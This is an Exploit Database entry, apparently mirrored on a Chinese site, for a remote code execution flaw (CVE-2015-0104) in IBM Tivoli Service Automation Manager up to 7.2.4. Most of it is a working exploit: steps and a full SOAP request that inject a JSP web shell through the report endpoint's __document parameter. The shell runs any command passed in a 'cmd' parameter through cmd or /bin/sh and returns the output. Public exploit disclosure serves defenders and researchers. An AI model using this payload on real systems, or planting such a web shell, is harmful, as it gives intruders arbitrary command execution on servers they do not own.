IBM Tivoli Service Automation Manager 7.2.4 – Remote Code Execution

• Exploit Database
• 15 阅读

• 作者： Jakub Palaczynski
  日期： 2014-12-12
• 类别：

  • webapps
  平台：

  • jsp
• 来源：https://www.exploit-db.com/exploits/36002/

• # Exploit Title: IBM Tivoli Service Automation Manager Remote Code Execution
  # Date: 12\12\2014
  # Exploit Author: Jakub Palaczynski
  # Vendor Homepage: http://www.ibm.com/
  # Version: All versions of IBM Tivoli Service Automation Manager up to 7.2.4
  # VU/CVE: VU#782708, CVE-2015-0104
  
  1. Create report
  2. Browse to: https://site/maximo/report?__document=/system/path/web/root/shell.jsp&__report=<valid_report_name>&appname=<valid_appname>&__requestid=&reportNum=
  3. Catch SOAP request generated by submitting form from previous step and inject JSP payload. Sample SOAP request:
  
  POST /maximo/report?__document=/system/path/web/root/shell.jsp&__report=<valid_report_name>&appname=<valid_appname>&__requestid=&__sessionId=<valid_sessionid> HTTP/1.1
  
  Host: site
  Content-Length: xxx
  
  <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><GetUpdatedObjects xmlns="http://schemas.eclipse.org/birt"><Operation><Target><Id>Document</Id><Type>Document</Type></Target><Operator>GetPage</Operator><Oprand><Name>where</Name><Value>aaaaaaaaaaaaaaaaaaaaaa<![CDATA[<%@ page import="java.util.*,java.io.*"%> 
  
  <% 
  
  try {
  
  String cmd; 
  
  String[] cmdarr; 
  
  String OS = System.getProperty("os.name"); 
  
  if (request.getParameter("cmd") != null) { 
  
  cmd = new String (request.getParameter("cmd")); 
  
  if (OS.startsWith("Windows")) { 
  
   cmdarr = new String [] {"cmd", "/C", cmd}; 
  
  } 
  
  else { 
  
   cmdarr = new String [] {"/bin/sh", "-c", cmd}; 
  
  } 
  
  Process p = Runtime.getRuntime().exec(cmdarr); 
  
  OutputStream os = p.getOutputStream(); 
  
  InputStream in = p.getInputStream(); 
  
  DataInputStream dis = new DataInputStream(in); 
  
  String disr = dis.readLine(); 
  
  while ( disr != null ) { 
  
  out.println(disr); 
  
  disr = dis.readLine(); 
  
  } 
  
  } 
  
  } catch (Exception e) { e.printStackTrace();}
  
  %>]]>aaaaaaaaaaaaaaaaaaaaaa</Value></Oprand><Oprand><Name>__isdisplay__where</Name><Value></Value></Oprand><Oprand><Name>appname</Name><Value>APPNAME</Value></Oprand><Oprand><Name>__isdisplay__appname</Name><Value>APPNAME</Value></Oprand><Oprand><Name>usepagebreaks</Name><Value>true</Value></Oprand><Oprand><Name>__isdisplay__usepagebreaks</Name><Value>true</Value></Oprand><Oprand><Name>__page</Name><Value>1</Value></Oprand><Oprand><Name>__svg</Name><Value>true</Value></Oprand><Oprand><Name>__page</Name><Value>1</Value></Oprand><Oprand><Name>__taskid</Name><Value></Value></Oprand></Operation></GetUpdatedObjects></soap:Body></soap:Envelope>
  
  4. Web shell is now ready to use in path specified in __document parameter's value